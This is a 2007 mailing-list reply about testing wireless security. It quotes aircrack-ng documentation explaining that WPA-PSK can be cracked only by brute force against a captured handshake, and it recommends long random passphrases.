Re: testing wireless security
- From: Josh Paetzel <josh@xxxxxxxxx>
- Date: Tue, 20 Nov 2007 07:56:38 -0600
On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote:
Josh Paetzel wrote:
When I looked in to this it seemed that the current state of affairs is
that WPA can only be broken by brute-forcing the key. I don't recall if
that could be done 'off-line' or not. My memory is that the needed info
to attempt bruteforcing could be done by simply receiving....no need to
attempt to associate to the AP was needed. I'm not really interested in
disseminating links to tools that can be used to break wireless security,
but simple google searches will give you the info you need.....and the
tools are in the ports tree for the most part.
Fortunately WPA allows keys that put even resource-rich attackers in to
the decade range to bruteforce.
That would not appear to be a limitation of aircrack-ng
http://www.freshports.org/net-mgmt/aircrack-ng/
aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can
recover this keys once enough encrypted packets have been captured.
It implements the standard FMS attack along with some optimizations
like KoreK attacks, thus making the attack much faster compared to
other WEP cracking tools. In fact aircrack is a set of tools for
auditing wireless networks.
That said, I haven't (yet) tried it myself ;)
Well, if you were to read your own link for a bit you'd eventually find...
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Quoting from the page....
WPA/WPA2 supports many types of authentication beyond pre-shared keys.
aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows
the network as having the authentication type of PSK, otherwise, don't bother
trying to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This
is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where
statistical methods can be used to speed up the cracking process, only plain
brute force techniques can be used against WPA/WPA2. That is, because the key
is not static, so collecting IVs like when cracking WEP encryption, does not
speed up the attack. The only thing that does give the information to start
an attack is the handshake between client and AP. Handshaking is done when
the client connects to the network. Although not absolutely true, for the
purposes of this tutorial, consider it true. Since the pre-shared key can be
from 8 to 63 characters in length, it effectively becomes impossible to crack
the pre-shared key.
The only time you can crack the pre-shared key is if it is a dictionary word
or relatively short in length. Conversely, if you want to have an unbreakable
wireless network at home, use WPA/WPA2 and a 63 character password composed
of random characters including special symbols.
--
Thanks,
Josh Paetzel
PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB
Attachment:
signature.asc
Description: This is a digitally signed message part.
- References:
- testing wireless security
- From: Mike Tancsa
- Re: testing wireless security
- From: Josh Paetzel
- Re: testing wireless security
- From: Mark D. Foster
- testing wireless security
- Prev by Date: Re: IPSEC help
- Next by Date: chkrootkit V. 0.47
- Previous by thread: Re: testing wireless security
- Next by thread: chkrootkit V. 0.47
- Index(es):
Relevant Pages
|
|
